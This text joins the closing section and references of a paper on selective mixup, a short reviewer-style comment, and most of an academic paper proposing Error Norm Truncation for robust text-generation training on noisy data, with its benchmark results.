simpler, well-known resampling methods. On datasets where mixup does bring benefits, we could then obtain even better results by combining the independent effects of the best mixup and resampling variants. **Limitations.** We focused on the simplest version selective mixup as described by Yao et al. (2022b). Many papers combine the principle with modifications to the learning objective (Hwang et al., 2022; Li et al., 2023; Lu et al., 2022a; Palakkadavath et al., 2022; Tian et al., 2023; Xu et al., 2020). Resampling likely plays a role in these methods too but this claim requires further investigation. We evaluated “only” five datasets. Since we introduced simple ablations that can single out the effects of resampling, we hope to see future re-evaluations of other datasets. Because we picked datasets that had previously shown benefits with selective mixup, we cannot fully verify the predicted failure when there is no “regression toward the mean” in the data. Still, we do present one experiment in Appendix C that convincingly verifies this prediction on yearbook by swapping the ID and OOD data. Finally, this work is not about designing new algorithms to surpass the state of the art. Our focus is on improving the scientific understanding of existing mixup strategies and their limitations. **Open questions.** Our results leave open the question of the applicability of selective mixup to real situations. The “regression toward the mean” explanation indicates that much of the observed improvements are accidental since they rely on an artefact of some datasets. In real deployments, distribution shifts cannot be foreseen in nature nor magnitude. This is a reminder of the relevance of Goodhart’s law to machine learning (Teney et al., 2020) and of the risk of overfitting to popular benchmarks (Liao et al., 2021). REFERENCES Kamyar Azizzadenesheli, Anqi Liu, Fanny Yang, and Animashree Anandkumar. Regularized learning for domain adaptation under label shifts. *arXiv preprint arXiv:1903.09734*, 2019. Chengtai Cao, Fan Zhou, Yurou Dai, and Jianping Wang. A survey of mix-based data augmentation: Taxonomy, methods, applications, and explainability. *arXiv preprint arXiv:2212.10888*, 2022. Saurabh Garg, Nick Erickson, James Sharpack, Alex Smola, Sivaraman Balakrishnan, and Zachary C Lipton. Rlsbench: Domain adaptation under relaxed label shift. *arXiv preprint arXiv:2302.03020*, 2023. Arthur Gretton, Alex Smola, Jiayuan Huang, Marcel Schmittfull, Karsten Borgwardt, and Bernhard Schölkopf. Covariate shift by kernel mean matching. *Dataset shift in machine learning*, 2009. Ishaan Gulrajani and David Lopez-Paz. In search of lost domain generalization. *arXiv preprint arXiv:2007.01434*, 2020. Ethan Harris, Antonia Marcu, Matthew Painter, Mahesan Niranjan, Adam Prügel-Bennett, and Jonathon Hare. Fmix: Enhancing mixed sample data augmentation. *arXiv preprint arXiv:2002.12047*, 2020. Inwoo Hwang, Sangjun Lee, Yunhyeok Kwak, Seong Joon Oh, Damien Teney, Jin-Hwa Kim, and Byoung-Tak Zhang. Selecmix: Debiased learning by contradicting-pair sampling. *arXiv preprint arXiv:2211.02291*, 2022. Badr Youbi Idrissi, Martin Arjovsky, Mohammad Pezeshki, and David Lopez-Paz. Simple data balancing achieves competitive worst-group-accuracy. In *Conference on Causal Learning and Reasoning*, 2022. Md Amirul Islam, Matthew Kowal, Konstantinos G Derpanis, and Neil DB Bruce. Segmix: Co-occurrence driven mixup for semantic segmentation and adversarial robustness. *International Journal of Computer Vision*, 131(3):701–716, 2023. Nathalie Japkowicz. The class imbalance problem: Significance and strategies. In *Proc. of the Int’l Conf. on artificial intelligence*, volume 56, pages 111–117, 2000. Masanari Kimura. Why mixup improves the model performance. In *International Conference on Artificial Neural Networks (ICANN)*, 2021. Pang Wei Koh, Shiori Sagawa, Henrik Marklund, Sang Michael Xie, Marvin Zhang, Akshay Bal-subramani, Weihua Hu, Michihiro Yasunaga, Richard Lanas Phillips, Irena Gao, et al. Wilds: A benchmark of in-the-wild distribution shifts. In *International Conference on Machine Learning*, 2021. Miroslav Kubat, Stan Matwin, et al. Addressing the curse of imbalanced training sets: one-sided selection. In *Icml*, volume 97, page 179. Citeseer, 1997. Da Li, Yongxin Yang, Yi-Zhe Song, and Timothy M Hospedales. Deeper, broader and artier domain generalization. In *IEEE International Conference on Computer Vision*, pages 5542–5550, 2017. Tang Li, Fengchun Qiao, Mengmeng Ma, and Xi Peng. Are data-driven explanations robust against out-of-distribution data? *arXiv preprint arXiv:2303.16390*, 2023. Thomas Liao, Rohan Taori, Inioluwa Deborah Raji, and Ludwig Schmidt. Are we learning yet? a meta review of evaluation failures across machine learning. In *Thirty-fifth Conference on Neural Information Processing Systems Datasets and Benchmarks Track (Round 2)*, 2021. Zachary Lipton, Yu-Xiang Wang, and Alexander Smola. Detecting and correcting for label shift with black box predictors. In *International conference on machine learning*, 2018. Zixuan Liu, Ziqiao Wang, Hongyu Guo, and Yongyi Mao. Over-training with mixup may hurt generalization. *arXiv preprint arXiv:2303.01475*, 2023.
zMvMwNvs4R
Even though the results have proven the effectiveness of ENT, I think the motivation of using error norm to estimate data quality can be further discussed and provide more insights about how do they correlate.
Error Norm Truncation: Robust Training in the Presence of Data Noise for Text Generation Models Tianjian Li, Haoran Xu, Philipp Koehn, Daniel Khashabi, Kenton Murray Center for Language and Speech Processing Johns Hopkins University, Baltimore MD {tli104, hxu64}@jhu.edu Abstract Text generation models are notoriously vulnerable to errors in the training data. With the widespread availability of massive amounts of web-crawled data becoming more commonplace, how can we enhance the robustness of models trained on a massive amount of noisy web-crawled text? In our work, we propose Error Norm Truncation (ENT), a robust enhancement to the standard training objective that truncates noisy data. Compared to methods that only use the negative log-likelihood loss over target words to estimate data quality, our method provides a more accurate estimation by considering the distribution of non-target tokens, which is often overlooked by previous work. Through comprehensive experiments across language modeling, machine translation, and text summarization, we show that equipping text generation models with ENT improves generation quality over standard training and previous soft and hard truncation methods. Furthermore, we show that our method improves the robustness of models against two of the most detrimental types of noise in machine translation, resulting in an increase of more than 2 BLEU points over the MLE baseline when up to 50% of noise is added to the data. 1 Introduction Advances in neural text generation models have achieved remarkable success in various downstream tasks, which include but not limited to machine translation (Kalchbrenner & Blunsom, 2013), summarization (Rush et al., 2015), question answering (Joshi et al., 2017) and story generation (Fan et al., 2018). The prevalent paradigm of training text generation models is maximum-likelihood estimation (MLE), which finds parameters that maximize the probability of each token from the training data conditioned on a given context. The limitation of MLE is that the model is forced to assign a non-zero probability to all tokens that appear in the training data, regardless of their quality, making the model not robust to errors in the training data. Existing research has demonstrated that text generation models are vulnerable to natural noise, such as misspelled and misordered words (Khayallah & Koehn, 2018) and adversarial noise, such as poisoned training data (Wang et al., 2021a; Wallace et al., 2021; Wan et al., 2023). To overcome this limitation, previous studies have either explored options to find alternatives to the autoregressive MLE paradigm (Khandelwal et al., 2021; Lewis et al., 2020b; An et al., 2022) or modify the MLE objective (Welleck et al., 2020; Li et al., 2020; Kang & Hashimoto, 2020; Lin et al., 2021; Pang & He, 2021; Xu et al., 2022; Ji et al., 2023). Modifications of MLE estimate data quality using the predicted probabilities of the ground truth token during training: a high probability corresponds to a higher likelihood that the ground truth token is clean and vice versa. Therefore, we can either directly remove data with high loss (Kang & Hashimoto, 2020; Goyal et al., 2022; Mohiuddin et al., 2022), or down-weight data with low probability (Li et al., 2021; Li et al., 2023) at each training iteration to improve robustness to data noise. However, estimating data quality only using the predicted probability of the target token ignores the distribution of the non-target tokens. For example, when a model assigns a low probability to a Figure 1: An motivating example of using the error norm for data quality estimation. All three examples have equal loss because they assign the same probability to the ground truth token. The skewness of the distribution of non-target tokens differentiates between the case when the context has high entropy with multiple possible continuations (example 1), when the model is at the beginning of training and is incompetent in making a prediction (example 2) and the case when the data is an error (example 3). Truncating high loss removes all three examples whereas truncating high $\ell_2$ error norm only removes the third erroneous example. Specific token, it could be the case that the context is high-entropy with many viable continuations, leading to a diluted probability of the target token (first example in Figure 1). Another possibility is that the model has not sufficiently converged and thus has not learned a reasonable distribution for this token (second example in Figure 1). In both cases, truncating this token or down-weighing the loss of this token could be harmful to model training. To consider the predicted distribution of non-target tokens when estimating data quality, we propose Error Norm Truncation (ENT). This modified objective uses the $\ell_2$ norm of the difference between the model’s predicted distribution and the one-hot vector of the ground truth to measure the quality of the data at each training iteration and truncate data with low quality. Intuitively, our method truncates tokens to which the model not only assigns a low probability but is very confident that it should be another token (third example in Figure 1). ENT improves robustness to data noise during training by accurately estimating data quality at the token level and removing noisy tokens. To sum up, our contribution is threefold: • We propose Error Norm Truncation: a data truncation method during training guided by a more accurate data quality estimation method that considers the probability distribution of non-target tokens; • Through experiments under different tasks and setups, we show Error Norm Truncation consistently outperforms the MLE baseline as well as strong baselines proposed by previous methods in generation quality; • We directly validate that Error Norm Truncation improves the robustness of machine translation models against two different types of noise: untranslated and randomly shuffled target sentences and outperforms all previous methods that truncate data. 2 BACKGROUND AND MOTIVATION Notation and Task Description. We consider an conditional text generation model $p_\theta(y|x)$. Given context $x$ and target sequence $y = (y_1, ..., y_T)$, the autoregressive framework models the probability of the target sequence conditioned on the context $p_\theta(y|x)$ by factorizing it to the sum of log-probabilities of individual tokens. The prediction for each time step $t$ is conditioned both on the context $x$ and the previous tokens $y_{<t}$: $$\log p_\theta(y|x) = \sum_{t=1}^{T} \log p_\theta(y_t|y_{<t}, x).$$ The context $x$ depends on the specific task: In machine translation, the context $x$ is the source sentence to be translated from. In summarization, the context $x$ is the article to be summarized. Standard language modeling can be seen as a special case where the context $x$ is empty. MLE maximizes the probability of the target sequences from a training corpus $\mathcal{D}$ by minimizing the expectation of the negative log-likelihood over the training corpus: $$L_\theta(x, y) = \mathbb{E}_{y \sim \mathcal{D}} \left[ \sum_{t=1}^{T} - \log p_\theta(y_t | y_{<t}, x) \right].$$ However, the MLE objective is not robust to noise (Ji et al., 2023), which can be observed by calculating the gradient of the MLE loss function with respect to a single token $y_t$: $$\nabla L_\theta(x, y_t) = - \frac{\nabla p_\theta(y_t | y_{<t}, x)}{p_\theta(y_t | y_{<t}, x)}.$$ When the data is incorrect and the predicted probability for the token $y_t$ (the denominator) is very small, the gradient norm $\|\nabla L_\theta(x, y_t)\|$ would be very large, resulting in a large gradient update to an undesired direction. **Previous Works.** The vulnerability of the MLE objective to noise cultivates research into truncating noisy data. A trivial method of estimating data quality $q(x, y)$ is to use the predicted probability $p_\theta(y | x)$. Intuitively, if the model assigns a low prediction probability to a training instance, it is more likely that the training instance is of low quality. However, in practice, a low prediction probability can also indicate a high entropy context rather than data quality. A natural way to mitigate this vulnerability is to hard remove the noisy data: **Loss Truncation** (Kang & Hashimoto, 2020) directly removes a fixed fraction of the training sentences with the highest loss by setting their loss to 0, given a fraction of data $c$ to prune out. The loss function for Loss Truncation is: $$L_{LT} = - \log p_\theta(y | x) \cdot \mathbb{I}(p_\theta(y | x) > \tau_{\theta,c}),$$ where $\mathbb{I}(\cdot)$ is the indicator function and $\tau_{\theta,c}$ is the threshold calculated by the $c$-th percentile of losses over the training data. Note that the threshold depends on the model’s current state since we use the model to rank training data and prune out a given percentage with the highest loss (or lowest predicted probabilities). Data truncation can also be done in a soft and fine-grained way: **TaiLr** (Ji et al., 2023) up-weighs individual tokens with higher predicted probabilities, smoothed by an interpolation between the ground truth distribution and the predicted probability of the model. The loss function \( L_{\text{TaiLr}} \) is: \[ E_{y \sim D} \left[ - \sum_{t=1}^{T} \left( \frac{p_\theta(y_t | y_{<t}, x)}{\gamma + (1 - \gamma) \cdot p_\theta(y_t | y_{<t}, x)} \right) \cdot \log p_\theta(y_t | y_{<t}, x) \right], \] where \( \gamma \) is a hyper-parameter for the smoothing factor. To overcome the issue of the model assigning a very small probability to all target tokens uniformly during the initial stage of training, TaiLr sets a lower threshold on the weighting factor as a hyperparameter. In our work, we consider Loss Truncation and TaiLr the most important baselines to compare. **Motivation.** We point out two limitations of estimating data quality only by training loss: - It is sensitive to the training iteration at which we start to estimate data quality and remove or down-weigh low-quality data. - It ignores the rich information contained in the probability distribution of the incorrect (non-target) tokens, treating high and low entropy contexts as equal. The first limitation arises from the model, when trained from scratch, undergoes multi-rounds of memorizing and forgetting ([Toneva et al., 2019], [Jiang et al., 2021], [Jagielski et al., 2023]) of individual examples. When a certain example is memorized, the model would label it as high quality and vice versa. This leads to high variance in measuring data quality throughout different stages of training. To overcome this issue, Loss Truncation first trains the model for a pre-defined number of iterations and then uses it to do quality estimation. TaiLr uses a pre-defined lower bound on the weighting factor. However, these methods require extensive hyper-parameter tuning due to the high variance, especially when estimating quality within a mini-batch at an arbitrary training iteration. The second limitation arises from negative log-likelihood loss ignores the skewness of the probability distribution over non-target tokens. For example, when the model assigns a low probability to the ground truth token ‘house’, it might have distributed the majority amount of probability mass to synonyms ‘building’, ‘hotel’ and ‘mansion’. There exist multiple correct predictions for a given context ([Ott et al., 2018], [Khayrallah et al., 2020]), and only using the probability of one token to indicate quality leads to misjudgment. ### 3 ERROR NORM TRUNCATION Motivated by methods in dataset pruning ([Paul et al., 2021]), we propose to estimate data quality using the \( \ell_2 \) norm of the difference vector between the model’s predicted distribution \( p_\theta(\cdot | y_{<t}, x) \) and the groundtruth one-hot distribution \( \text{OH}(y_t) \): \[ q(y_t, x) = \| p_\theta(\cdot | y_{<t}, x) - \text{OH}(y_t) \|_2, \] which we refer as the **error norm**. \( \text{OH}(y_t) \) is a vector with all zeros except the entry at \( y_t \) is one. At each training iteration, we set a threshold as a hyper-parameter and hard prune out the tokens with an error norm above the threshold. The loss function for Error Norm Truncation (ENT) is: \[ L_{\text{ENT}} = E_{y \sim D}[- \log p_\theta(y | x) \cdot \mathbb{I}(q(y_t, x) < \tau_{\theta,c})]. \] The \( \ell_2 \) error norm presents a solution jointly to the two aforementioned limitations due to an observation: **the probability distribution of the incorrect tokens only becomes skewed after multiple** --- 1We provide PyTorch style pseudocode of Error Norm Truncation in Appendix D. iterations of training. Initially, when the model does not have enough knowledge to make a prediction, the error norm for all data is close to 1, indicating that our model uniformly assigns probabilities to all target tokens. After multiple iterations of training, when the model has enough knowledge, the error norm of data noise becomes significantly larger. Figure 3 illustrates the state transition of the model from warming up to being able to make an estimate of data quality, corresponding to the horizontal red line at around training iteration 500. Setting a threshold on error norm allows the model to learn from all the data during the initial stage to make an educated estimate of data quality. Theoretical Connections. As Kang & Hashimoto (2020) points out, a measurement of difference between probability distributions that is more robust to noise than the standard KL-Divergence (KLD) Kullback & Leibler (1951) is the Total Variation Distance (TVD) van Handel (2016), defined by the supremum of difference assigned to the same event. Intuitively, TVD measures the distinguishability between two distributions. Given two probability distributions \( p \) and \( q \) over all possible sequence \( Y \), the TVD between them is: \[ \text{TVD}(p, q) = \sup_{y \in Y} |p(y) - q(y)|. \] Li et al. (2023) factorizes the sequence level TVD to the token level and proves that the token level TVD is an upper bound of the sequence level TVD, therefore minimizing the token-level TVD is able to make the model more robust to noise in the data. We show connections between error \( \ell_2 \) norm, the token-level TVD and the KL-Divergence. By Pinsker’s Inequality, we have \[ \frac{1}{2} \|p_\theta - \text{OH}(y_t)\|_2 \leq \frac{1}{2} \|p_\theta - \text{OH}(y_t)\|_1 = \sup_{y \in V} |p(y) - \text{OH}(y_t)| \leq \sqrt{\frac{1}{2} \text{KLD}(p_\theta || \text{OH}(y_t))}. \] We see that the error \( \ell_2 \) norm is a lower bound of the estimator of token level TVD. Examples with high error norm indicate a higher total variation distance, whereas examples with high loss (KLD) do not necessarily indicate a high TVD since it is a loose (Canonne, 2023) upper bound. Therefore, truncating examples with high error norms removes noisy data that has a higher TVD with the model’s prediction learned from other instances. 4 CASE STUDIES Error Norm clearly distinguishes between clean and noisy tokens. It is well established in robust statistics that \( \ell_2 \) error norm is more sensitive to outliers (Hastie et al., 2001) than \( \ell_1 \) norm, so \( \ell_2 \) norm is better in detecting outliers in data than \( \ell_1 \) norm. We prove the equivalency of using the error \( \ell_1 \) norm and standard loss in ranking data quality at Appendix A. To empirically show the superiority of using the \( \ell_2 \) norm in distinguishing between clean and noisy tokens, we use the dataset from Kang & Hashimoto (2020) which contains 300 examples from the Gigaword text summarization dataset where each summary is annotated into two categories: 1) directly entailed and 2) contains facts that cannot be inferred from the context. We find the precise tokens that are not entailed by the input and label them as hallucinate and label all the other tokens as clean. We plot the normalized histograms of negative log-likelihood loss and error norm between clean and hallucinate tokens at figure 4a and 4b evaluated by a pre-trained BART-large model. The overlap between clean and noisy distributions of loss (shaded area in figure 4a) is larger than the overlap of error norm (shaded area in figure 4b), indicating that error norm distinguishes between clean and noisy examples more clearly than negative log-likelihood loss. Error Norm provides a more accurate measure of data quality. We directly verify that our method does provide a more accurate estimate of data quality. We plot out the BLEU scores of multilingual machine translation of 4 directions: En={De, Fr, It, Es} with a fixed fraction of sentences pruned out according to different metrics at Figure 5. ENT was able to match the performance of the baseline at small pruning fractions (10%-20%) while having in the least drop of performance. --- 2For simplicity, we rewrite the probability distribution of predicted probabilities \( p_\theta(\cdot | y_{<t}, x) \) as \( p_\theta \). at high pruning fractions, outperforming randomly pruning for 2.43 BLEU and outperforming Loss Truncation by 0.88 BLEU when 60% of the data is pruned out. This shows that Error Norm provides a more accurate estimate of data quality than negative log-likelihood loss. 5 EXPERIMENTS In this section, we show that truncating tokens with high error norm improves generation quality across different tasks. We describe the setup for all of our experiments at §5.1. We validate that our methods improve robustness under synthetic noise at §5.2. We present our experiment results under the train-from-scratch setting at §5.3 and under the fine-tune setting at §5.4. We include results of both truncating a fixed fraction of data (ENT-Fraction) and truncating according to a pre-defined threshold (ENT-Threshold). Detailed dataset statistics and hyper-parameters are at Appendix C. 5.1 SETUP Robustness Experiments. To directly verify the ENT improves robustness, we inject noise into 1M parallel sentences of En-Fr data from the opus-100 dataset. We select two of the most harmful type of noise [Khayrallah & Koehn, 2018]: Untranslated Text where the source sentence is directly copied to the target side; Misordered Words where the words at the target side is randomly shuffled. We vary the amount of noise added to the corpus {10%, 20%, 30%, 40%, 50%} of the size of the original clean corpus and report the BLEU scores of models trained on MLE equipped with Loss Truncation, TaiLr and ENT-Fraction on the perturbed datasets. Train-from-Scratch. We evaluate our method on machine translation and general language modeling. For multilingual translation, we train a single model for eight directions en-{es, fa, fr, it, ko, ru, tr, zh} from the opus-100 corpus[^3] [Zhang et al., 2020] using 1M parallel sentences for each direction. We train on the fairseq [Ott et al., 2019] implementation of the standard Transformer [Vaswani et al., 2017] architecture[^4] for all of our machine translation experiments. For language modeling, we train [^3]: https://opus.nlpl.eu/opus-100.php [^4]: transformer_iwslt_de_en a GPT2-large (Radford et al., 2019) model on the WikiText-103 dataset (Merity et al., 2017) for 5 epochs from scratch. We use the Huggingface (Wolf et al., 2020) implementation of GPT2-large. **Fine-Tuning.** We validate our method on the text summarization CNN/Daily Mail (See et al., 2017; Hermann et al., 2015) dataset on two different models: T5-small (Raffel et al., 2020) and BART-base (Lewis et al., 2020a) to validate our method generalizes across different pre-trained models. We use the Huggingface implementations of T5 and BART. ### 5.2 ROBUSTNESS RESULTS **Untranslated Text.** Table 1 shows the BLEU results of machine translation models trained on corpus with different level of untranslated text injected. Since the corpus is high-quality data from the opus-100 training set, the difference between various methods that aim to improve robustness to noise is small when no noise is added. The MLE baseline model’s scores gradually decrease with increased injection, revealing the negative impact of untranslated sentences. Loss Truncation maintains similar BLEU scores. TaiLr exhibits modest gains in both metrics. Notably, Error Norm Truncation consistently improves performance with higher injection percentages. Outperforming the baseline 3.8 BLEU and outperforming the best of Loss Truncation and TaiLr 2.1 BLEU when 50% of noise is injected. These results emphasize the challenge of handling untranslated content, with the Error Norm Truncation proving exceptionally effective in mitigating this issue and enhancing translation quality. **Misordered Words.** Table 2 shows the BLEU results of models when trained on data with misordered sentences injected at the target side. Our results echo with the results in Khayrallah & Koehn (2018), showing that randomly shuffling the target sentence is a weaker type of noise compared to directly copying the source text to the target. Although Loss Truncation was able to improve upon the baseline when a small amount of noise is added (10-20%), it performs the same as standard MLE training at when a larger amount of misordered sentences are added to the training data. ENT is the most resilient method against misordered words at the target side, resulting in the largest BLEU scores improvement over the baseline in all noise levels. It outperforms the baseline 0.9 BLEU when 50% of randomly shuffled sentences are injected and only underperforms 0.1 BLEU against the performance of standard training on clean data, indicating the resilience of the model against randomly shuffled target sentences when equipped with ENT. ### 5.3 TRAIN-FROM-SCRATCH RESULTS **Language Modeling.** We first evaluate our method on general language modeling. Table 3 shows the results of the validation perplexity of pre-training a GPT-2 Large model on WikiText-103 from scratch. Hard truncation methods (Loss Truncation and Error Norm Truncation) were able to lower the perplexity by more than 1 point compared to the MLE baseline. Truncating with error norm | Untranslated | 0% | 10% | 20% | 30% | 40% | 50% | |--------------|------|------|------|------|------|------| | MLE | 36.5 | 34.9 | 33.2 | 30.6 | 31.0 | 28.6 | | Loss Trunc. | 36.5 | 33.2 | 32.5 | 31.5 | 31.4 | 29.4 | | TaiLr | 36.6 | 34.3 | 33.4 | 31.5 | 31.6 | 30.3 | | ENT-Fraction | **36.7** | **33.3** | **33.8** | **33.3** | **33.1** | **32.4** | Table 1: BLEU scores of models trained on opus-100 En-Fr data injected with the source sentence directly copied to the target side (Untranslated Text) ranging from 10% to 50% of the original clean data. Truncating with error norm is the most robust method against untranslated sentence. | Misordered | 0% | 10% | 20% | 30% | 40% | 50% | |------------|------|------|------|------|------|------| | MLE | 36.5 | 36.1 | 36.1 | 36.2 | 35.8 | 35.5 | | Loss Trunc.| 36.5 | 36.1 | 36.1 | 36.2 | 35.8 | 35.7 | | TaiLr | 36.6 | 36.2 | 36.2 | 36.3 | 36.2 | 36.2 | | ENT-Fraction | **36.7** | **36.3** | **36.7** | **36.7** | **36.5** | **36.4** | Table 2: BLEU scores of models trained on opus-100 En-Fr data injected with parallel sentences randomly shuffled (Misordered Words) at the target side ranging from 10% to 50% of the original clean data. Truncating with error norm was able to improve upon the baseline the most compared to existing methods. outperforms truncating with loss for a fixed fraction. Truncating to a given threshold outperforms all existing methods by lowering 1.58 perplexity compared to the MLE baseline. | | MLE | Loss Truncation | TaiLr | ENT-Fraction | ENT-Threshold | |----------------|-------|-----------------|-------|--------------|---------------| | PPL. ↓ | 25.88 | 24.64 | 25.62 | 24.50 | **24.30** | Table 3: Validation perplexity on WikiText-103 of pre-training a GPT2-large model with different data truncation methods. Truncating with error norm outperforms the MLE baseline by 1.38 perplexity while truncating to a given threshold further improves the performance by 0.2 points in perplexity. To show that Error Norm Truncation is less sensitive to the iteration from which soft or hard data truncation methods are applied, we vary this iteration \( \in \{0, 100, 200, 500, 1000\} \) parameter updates and plot out the validation perplexity on WikiText-103 of different methods at Figure 6. We see that ENT-Fraction is able to outperform previous methods while having the lowest variance and ENT-Threshold further improves the performance over ENT-Fraction. We highlight that large-scale language model pre-training is too expensive to tryout a combinatorially large number of hyper-parameters, therefore our method is more scalable to large-scale pre-training tasks compared to other methods due to the low variance and high performance. Machine Translation. Table 4 shows the BLEU results on Multilingual Machine Translation, where 1M parallel sentences for each language pair from a set of linguistically diverse languages are concatenated for training a large model. We find that previous methods often underperform the MLE baseline due to not capturing the model’s competency during truncating, while our method consistently outperforms the baseline. Our method also outperforms Loss Truncation in 6 out of 8 directions, given a fixed pruning threshold. | En-{ } | Es | Fa | Fr | It | Ko | Ru | Tr | Zh | Avg. | |--------|----|----|----|----|----|----|----|----|------| | MLE | 40.5 | 14.2 | 40.4 | 35.1 | 10.1 | 36.3 | 25 | 39.2 | 30.1 | | Loss Truncation | 39.8 | 14.0 | 40.1 | 34.4 | 9.9 | 36.5 | 24.7 | **40.1** | 29.9 | | TaiLr | 40.4 | 14.0 | 40.2 | 35.1 | 10.0 | 36.1 | 25.2 | 39.6 | 30.1 | | ENT-Fraction | 41.1 | 14.8 | 40.3 | **35.2** | **10.3** | 36.4 | 25.0 | 39.6 | 30.3 | | ENT-Threshold | **41.9** | **14.9** | **41** | 34.8 | 10.2 | **36.5** | **25.5** | 39.8 | **30.6** | Table 4: BLEU results on a linguistically diverse subset of the opus-100 dataset. Error Norm Truncation with threshold and fraction outperforms the baseline and Loss Truncation in 7 out of 8 directions. 5.4 Fine-Tuning Results Summarization. Table 5 shows the results of fine-tuning T5-small and BART-base on the CNN/Daily Mail Summarization dataset. Since we can rely on the pre-trained model to make an estimate of the data quality, we do not need to pre-define a threshold for the model. Directly pruning out a fraction of data produces the best result in this case. Again, we were able to observe that truncating with error norm consistently outperforms all other methods in two different models. 6 Related Works Modifications to MLE for Text Generation. As the MLE objective is not robust to noise, numerous work have proposed ways to modify the MLE objective. Welleck et al. (2020) proposes | | T5-small | | BART-base | | |------------------|----------|----------|-----------|----------| | | R-1 | R-2 | R-L | R-1 | R-2 | R-L | | MLE | 42.19 | 19.69 | 39.04 | 43.50 | 20.59 | 40.36 | | Loss Truncation | 42.22 | 19.68 | 39.05 | 43.22 | 20.66 | 40.44 | | TaiLr | 41.53 | 19.22 | 38.33 | 42.20 | 19.66 | 39.07 | | ENT-Fraction | **42.63**| **19.98**| **39.57** | 43.48 | 20.29 | **40.72** | | ENT-Threshold | 42.37 | 19.80 | 39.27 | 43.35 | 20.30 | 40.54 | Table 5: Best validation rouge-1/2/LSum results on fine-tuning T5-small and BART-base equipped with different robust modifications to MLE on the CNN/Daily Mail dataset. ENT is able to outperform baselines on T5-small and match the performance of baselines on BART-base. to augment the MLE objective by penalizing the model for generating undesired outputs. Xu et al. (2022) directly penalizes the model for generating repetitions. Lin et al. (2021) modifies the gradient to encourage the model to generate diverse text. Kang & Hashimoto (2020) truncate a given fraction of data with the highest loss to remove noise from the data. Pang & He (2021) reformulates text generation as an off-policy and offline reinforcement learning problem, assigning weights to each token according to a pre-defined reward function. Similarly, Ji et al. (2023) also reweighs each token from the training dataset by the prediction probability of the model, smoothed by interpolation between the one-hot probability vector and the predicted probability vector. Li et al. (2020) points out that the standard MLE objective treats all incorrect tokens as equal and proposes to learn a prior distribution over the tokens using the training data and smooth the one-hot ground truth distribution to a Gaussian distribution over tokens with similar embeddings. Welleck et al. (2023) proposes first to generate an intermediate output using MLE and iteratively refines the generation. To the best of our knowledge, our work is the first to address the limitations of only relying on the output probabilities in estimating data utility. Measuring Data Utility in NLP. Numerous works have proposed methods to estimate the contribution of each single data point in Natural Language Processing. For text generation tasks, the quality of data can be as simple as handcrafted heuristics such as word frequency and sequence length (Platanios et al., 2019), the relative position of the word in a sentence (Liang et al., 2021; Jia et al., 2023), the similarity to a target domain (Moore & Lewis, 2010; Zhang et al., 2019). Besides handcrafted heuristics, model generations (Wettig et al., 2024; Liu et al., 2024) and signals (loss, gradient, and representations) can also be utilized to measure data quality. Koh & Liang (2017) imports Influence Functions (Cook & Weisberg, 1975) from statistical theory to deep learning, measuring the utility of each training example by the difference between the parameters of the model trained with and without the particular training example. However, this estimation requires the computation of single sample gradients, which is impractical when the training dataset is large. Paul et al. (2021) shows that the influence on training loss of removing one particular training example is upper bounded by the gradient norm when trained on that example and proposes to approximate the single sample gradient norm by the error $\ell_2$ norm. All of the above methods assume that the data utility is static. Our work differs in that our method takes into account the training dynamics while making quality estimations. For a comprehensive survey on data selection for NLP, we refer the readers to Albalak et al. (2024). Additional related works on measuring data utility with model signals and discussions on Influence Functions are provided in Appendix B. 7 CONCLUSION AND LIMITATIONS Conclusion. Our work proposes Error Norm Truncation (ENT), a robust modification to the standard MLE objective in training text generation models. ENT measures the quality of each token by considering the skewness of the predicted distribution and truncates the noisy tokens during training. ENT demonstrates enhanced stability and superior performance over existing methods. Limitations. We acknowledge that the improvements of our method result from the noisy distribution of the training data, therefore the improvements on clean, curated data might not be as large. We leave more coarse-grained grouped data and dataset quality estimation for future work. REFERENCES Julius Adebayo, Melissa Hall, Bowen Yu, and Bobbie Chern. Quantifying and mitigating the impact of label errors on model disparity metrics. In *The Eleventh International Conference on Learning Representations*, 2023. URL https://openreview.net/forum?id=RUzSobdYyOV. Alon Albalak, Yanai Elazar, Sang Michael Xie, Shayne Longpre, Nathan Lambert, Xinyi Wang, Niklas Muennighoff, Bairu Hou, Liangming Pan, Haewon Jeong, Colin Raffel, Shiyu Chang, Tatsunori Hashimoto, and William Yang Wang. A survey on data selection for language models, 2024. Chenxin An, Jiangtao Feng, Kai Lv, Lingpeng Kong, Xipeng Qiu, and Xuanjing Huang. Cont: Contrastive neural text generation. *arXiv preprint arXiv:2205.14690*, 2022. URL https://arxiv.org/abs/2205.14690. Marta Bañón, Pinzhen Chen, Barry Haddow, Kenneth Heafield, Hieu Hoang, Miquel Esplà-Gomis, Mikel L. Forcada, Amir Kamran, Faheem Kirefu, Philipp Koehn, Sergio Ortiz Rojas, Leopoldo Pla Sempere, Gema Ramírez-Sánchez, Elsa Sarriás, Marek Strelec, Brian Thompson, William Waite, Dion Wiggins, and Jaume Zaragoza. ParaCrawl: Web-scale acquisition of parallel corpora. In *Proceedings of the 58th Annual Meeting of the Association for Computational Linguistics*, pp. 4555–4567, Online, July 2020. Association for Computational Linguistics. doi: 10.18653/v1/2020.acl-main.417. URL https://aclanthology.org/2020.acl-main.417. Samyadeep Basu, Phil Pope, and Soheil Feizi. Influence functions in deep learning are fragile. In *International Conference on Learning Representations*, 2021. URL https://openreview.net/forum?id=xHKVVHGDOEk. Ondřej Bojar, Rajen Chatterjee, Christian Federmann, Yvette Graham, Barry Haddow, Shujian Huang, Matthias Huck, Philipp Koehn, Qun Liu, Varvara Logacheva, Christof Monz, Matteo Negri, Matt Post, Raphael Rubino, Lucia Specia, and Marco Turchi. Findings of the 2017 conference on machine translation (wmt17). In *Proceedings of the Second Conference on Machine Translation, Volume 2: Shared Task Papers*, pp. 169–214, Copenhagen, Denmark, September 2017. Association for Computational Linguistics. URL http://www.aclweb.org/anthology/W17-4717. Clément L. Canonne. A short note on an inequality between kl and tv, 2023. URL https://arxiv.org/abs/2202.07198. R. Dennis Cook and Sanford Weisberg. *Residuals and influence in regression*. Chapman & Hall, 1975. URL https://conservancy.umn.edu/handle/11299/37076. Angela Fan, Mike Lewis, and Yann Dauphin. Hierarchical neural story generation. In *Proceedings of the 56th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers)*, pp. 889–898, Melbourne, Australia, July 2018. Association for Computational Linguistics. doi: 10.18653/v1/P18-1082. URL https://aclanthology.org/P18-1082. Simin Fan, Matteo Tagliardini, and Martin Jaggi. Doge: Domain reweighting with generalization estimation, 2024. Marcello Federico, Sebastian Stüker, and François Yvon (eds.). *Proceedings of the 11th International Workshop on Spoken Language 